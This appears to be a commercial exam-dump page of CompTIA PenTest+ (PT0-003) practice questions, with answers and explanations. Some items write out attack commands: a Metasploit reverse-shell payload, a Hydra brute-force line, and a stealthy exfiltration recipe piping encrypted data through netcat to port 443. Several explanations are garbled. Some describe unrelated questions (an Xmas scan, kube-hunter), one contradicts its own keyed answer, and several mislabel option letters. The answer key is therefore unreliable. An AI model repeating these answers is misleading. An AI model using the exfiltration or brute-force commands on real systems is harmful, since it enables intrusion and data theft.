Real PT0-003 Exam PDF Test Engine Practice Test Questions
CompTIA PT0-003 Real 2026 Braindumps Mock Exam Dumps
CompTIA PT0-003 Exam Syllabus Topics:
| Topic | Details |
|---|---|
| Topic 1 |
|
| Topic 2 |
|
| Topic 3 |
|
| Topic 4 |
|
| Topic 5 |
|
NEW QUESTION # 138
A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?
- A. python3 ./buffer_overflow_with_shellcode.py <target> 445
- B. msf > use <module_name> msf > set <options> msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run
- C. responder -I eth0 john responder_output.txt <rdp to target>
- D. hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://<target_host>
Answer: C
Explanation:
Responder is a tool used for capturing and analyzing NetBIOS, LLMNR, and MDNS queries to perform various man-in-the-middle (MITM) attacks. It can be used to capture hashed credentials, which can then be cracked offline. Using Responder has the least impact on the host's operating stability compared to more aggressive methods like buffer overflow attacks or payload injections.
NEW QUESTION # 139
A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?
- A. Installing packet capture software on the server
- B. Reconfiguring the application to use a proxy
- C. Requesting that certificate pinning be disabled
- D. Utilizing port mirroring on a firewall appliance
Answer: D
Explanation:
Using port mirroring on a firewall appliance is the safest and most non-intrusive way to validate if the application encrypts data in transit.
Why Port Mirroring?
Port mirroring (SPAN) enables traffic from the ICS system to be copied and sent to a monitoring device without affecting the host system.
This avoids any tampering with the application or host, preserving enterprise support terms.
Other Options:
B (Installing packet capture software): Installing software on the server would violate the terms of use and tamper with the host.
C (Reconfiguring the application): Reconfiguring the application to use a proxy would require modification, violating the terms of use.
D (Requesting that certificate pinning be disabled): This would involve modifying the application configuration, which is against the terms of use.
CompTIA Pentest+ Reference:
Domain 2.0 (Information Gathering and Vulnerability Identification)
ICS and SCADA Security Guidelines
NEW QUESTION # 140
Given the following Nmap scan command:
[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101
Which of the following is the total number of servers that Nmap will attempt to scan?
- A. 0
- B. 1
- C. 2
- D. 3
Answer: B
Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is excluded, so the total number of servers that Nmap will attempt to scan is 255. References:
Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts, Subsection: Excluding Hosts from Search Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection:
-exclude
NEW QUESTION # 141
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
- A. Scrape web presences and social-networking sites.
- B. Runtime the company's vendor/supply chain.
- C. Specially craft and deploy phishing emails to key company leaders.
- D. Run a vulnerability scan against the company's external website.
Answer: A
NEW QUESTION # 142
A company has hired a penetration tester to deploy and set up a rogue access point on the network.
Which of the following is the BEST tool to use to accomplish this goal?
- A. Aircrack-ng
- B. Kismet
- C. Wireshark
- D. Wifite
Answer: A
Explanation:
Reference:
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack-0183880/
https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-
NEW QUESTION # 143
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
- A. devices are obsolete and are no longer available for replacement.
- B. protocols are more difficult to understand.
- C. devices may cause physical world effects.
- D. devices produce more heat and consume more power.
Answer: C
Explanation:
"A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the presence idle open connections may result into errors that cannot be handled by the devices.
Reference: https://www.hindawi.com/journals/scn/2018/3794603/
NEW QUESTION # 144
A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?
- A. Document which commands can be executed.
- B. Include the findings in the final report.
- C. Use this feature to further compromise the server.
- D. Notify the client immediately.
Answer: D
Explanation:
The Nmap command uses the Xmas scan technique, which sends packets with the FIN, PSH, and URG flags set. This is an attempt to bypass firewall rules and elicit a response from open ports. However, if the target responds with an RST packet, it means that the port is closed. Open ports will either ignore the Xmas scan packets or send back an ACK packet. Therefore, the information most likely indicates that all of the ports in the target range are closed. References: [Nmap Scan Types], [Nmap Port Scanning Techniques], [CompTIA PenTest+ Study Guide: Exam PT0-002, Chapter 4: Conducting Passive Reconnaissance, page 127]
NEW QUESTION # 145
A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?
- A. Sniffing
- B. Ping sweeps
- C. Banner grabbing
- D. TCP/UDP scanning
Answer: A
Explanation:
To gather information about the network without causing detection mechanisms to flag the reconnaissance activities, the penetration tester should use sniffing.
Sniffing:
Definition: Sniffing involves capturing and analyzing network traffic passing through the network. It is a passive reconnaissance technique that does not generate detectable traffic on the network.
Tools: Tools like Wireshark and tcpdump are commonly used for sniffing. They capture packets and provide insights into network communications, protocols in use, devices, and potential vulnerabilities.
Advantages:
Stealthy: Since sniffing is passive, it does not generate additional traffic that could be detected by intrusion detection systems (IDS) or other monitoring tools.
Information Gathered: Sniffing can reveal IP addresses, MAC addresses, open ports, running services, and potentially sensitive information transmitted in plaintext.
Comparison with Other Techniques:
Banner Grabbing: Active technique that sends requests to a target service to gather information from banners, which can be detected.
TCP/UDP Scanning: Active technique that sends packets to probe open ports and services, easily detected by network monitoring tools.
Ping Sweeps: Active technique that sends ICMP echo requests to determine live hosts, also detectable by network monitoring.
Pentest Reference:
Reconnaissance Phase: Using passive techniques like sniffing during the initial reconnaissance phase helps gather information without alerting the target.
Network Analysis: Understanding the network topology and identifying key assets and vulnerabilities without generating traffic that could trigger alarms.
By using sniffing, the penetration tester can gather detailed information about the network in a stealthy manner, minimizing the risk of detection.
NEW QUESTION # 146
A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?
- A. HTML scraping
- B. URL spidering
- C. Covert data exfiltration
- D. DoS attack
Answer: C
Explanation:
An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.
* Option A (Covert data exfiltration) #: Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.
* Option B (URL spidering) #: Would cause increased web traffic, not DNS requests.
* Option C (HTML scraping) #: Involves parsing web pages, not DNS traffic.
* Option D (DoS attack) #: DoS floods bandwidth or servers, but does not increase DNS queries significantly.
# Reference: CompTIA PenTest+ PT0-003 Official Guide - DNS Tunneling & Data Exfiltration
NEW QUESTION # 147
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?
- A. inurl:
- B. site:
- C. link:
- D. intitle:
Answer: B
Explanation:
The site: command can be used to restrict searches on Google to a specific domain. For example, site:company.com will return only results from the company.com domain. This can help the penetration tester to find information or pages related to the target domain.
NEW QUESTION # 148
Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?
- A. Tailgating
- B. Shoulder surfing
- C. Site survey
- D. Badge cloning
Answer: A
Explanation:
Tailgating is the term used to describe a situation where a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee.
NEW QUESTION # 149
A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?
- A. Apply 3DES to the data and send over a tunnel UDP port 53.
- B. Apply AES-256 to the data and send over a tunnel to TCP port 443.
- C. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
- D. Apply Base64 to the data and send over a tunnel to TCP port 80.
Answer: B
Explanation:
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
Step-by-Step Explanation
Encrypting Data with AES-256:
Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.
Example encryption command using OpenSSL:
openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey Setting Up a Secure Tunnel:
Use a tool like OpenSSH to create a secure tunnel over TCP port 443.
Example command to set up a tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
Transferring Data Over the Tunnel:
Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.
Example Netcat command to send data:
cat encrypted.bin | nc targetserver 443
Benefits of Using AES-256 and Port 443:
Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.
Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.
Real-World Example:
During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.
Reference from Pentesting Literature:
Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.
Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups
NEW QUESTION # 150
While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?
- A. Nmap
- B. Shodan
- C. Amass
- D. theHarvester
Answer: B
Explanation:
Shodan is a search engine that specializes in finding internet-connected devices, including ICS, IoT, webcams, routers, and servers. Attackers and security professionals use Shodan to scan for publicly accessible systems that may be vulnerable.
* Option A (theHarvester) #: theHarvester is primarily used for OSINT (Open-Source Intelligence) gathering, such as email addresses, subdomains, and hostnames, but it does not specialize in ICS/IoT discovery.
* Option B (Shodan) #: Correct. Shodan scans the internet for connected devices and services, allowing penetration testers to find ICS/IoT systems that are exposed.
* Option C (Amass) #: Amass is used for subdomain enumeration and DNS reconnaissance, not for ICS or IoT discovery.
* Option D (Nmap) #: Nmap is a port scanner that can identify live hosts and open ports, but it does not search for publicly available systems on a large scale like Shodan.
# Reference: CompTIA PenTest+ PT0-003 Official Guide - OSINT and Reconnaissance
NEW QUESTION # 151
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1
Answer:
Explanation:
See all the solutions below in Explanation.
Explanation:
A screenshot of a computer Description automatically generated
NEW QUESTION # 152
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
- A. Information regarding the business impact if compromised
- B. A quick description of the vulnerability and a high-level control to fix it
- C. The rules of engagement from the assessment
- D. The executive summary and information regarding the testing company
Answer: B
NEW QUESTION # 153
A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?
- A. SAST
- B. SBOM
- C. IAST
- D. DAST
Answer: A
Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations. Here's why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.
NEW QUESTION # 154
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
- A. nmap -sU -sN -p 1-65535 example.com
- B. nmap -sU -sT -p 1-65535 example.com
- C. nmap -sU -sW -p 1-65535 example.com
- D. nmap -sU -sY -p 1-65535 example.com
Answer: B
Explanation:
To find the state of both TCP and UDP ports using Nmap, the appropriate command should combine both TCP and UDP scan options:
* Understanding the Options:
* -sU: Performs a UDP scan.
* -sT: Performs a TCP connect scan.
* Command Explanation:
* Command: nmap -sU -sT -p 1-65535 example.com
* Explanation: This command will scan both TCP and UDP ports from 1 to 65535 on the target example.com. Combining -sU and -sT ensures that both types of services are scanned.
* Comparison with Other Options:
* -sW: Initiates a TCP Window scan, not relevant for identifying the state of TCP and UDP services.
* -sY: Initiates a SCTP INIT scan, not relevant for this context.
* -sN: Initiates a TCP Null scan, which is not used for discovering UDP services.
NEW QUESTION # 155
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
- A. nmap -p0 -T0 -sS 192.168.1.10
- B. nmap -sA -sV --host-timeout 60 192.168.1.10
- C. nmap -A -n 192.168.1.10
- D. nmap -f --badsum 192.168.1.10
Answer: D
Explanation:
The nmap -f --badsum 192.168.1.10 command is most likely to avoid detection by the client's IDS, as it will use two techniques to evade IDS signatures or filters. The -f option will fragment the IP packets into smaller pieces that might bypass some IDS rules or firewalls. The --badsum option will use an invalid checksum in the TCP or UDP header that might cause some IDS systems to ignore the packets.
NEW QUESTION # 156
A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts.
The executive report outlines the following:
The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?
- A. Server 2
- B. Server 1
- C. Server 4
- D. Server 3
Answer: D
Explanation:
Since the client is worried about the availability of their consumer-facing application, the perimeter network web server (Server 3) is the most critical because:
* It is internet-facing, making it a prime target for attackers.
* A compromise could lead to data breaches, downtime, or service disruptions.
* Even though it has fewer vulnerabilities (14 vs. 92 on QA server), its exposure is higher.
* Option A (Development sandbox server) #: Internal and not publicly accessible.
* Option B (Back-office file transfer server) #: Important, but not consumer-facing.
* Option C (Perimeter web server) #: Correct. Publicly accessible and critical to operations.
* Option D (Developer QA server) #: May have more vulnerabilities, but it's less critical.
# Reference: CompTIA PenTest+ PT0-003 Official Guide - Prioritizing Vulnerability Testing
NEW QUESTION # 157
......
Prepare For The PT0-003 Question Papers In Advance: https://www.realexamfree.com/PT0-003-real-exam-dumps.html
Released CompTIA PT0-003 Updated Questions PDF: https://drive.google.com/open?id=11437Sl2L79YlOpXySHMzWs5hGi7Jde80
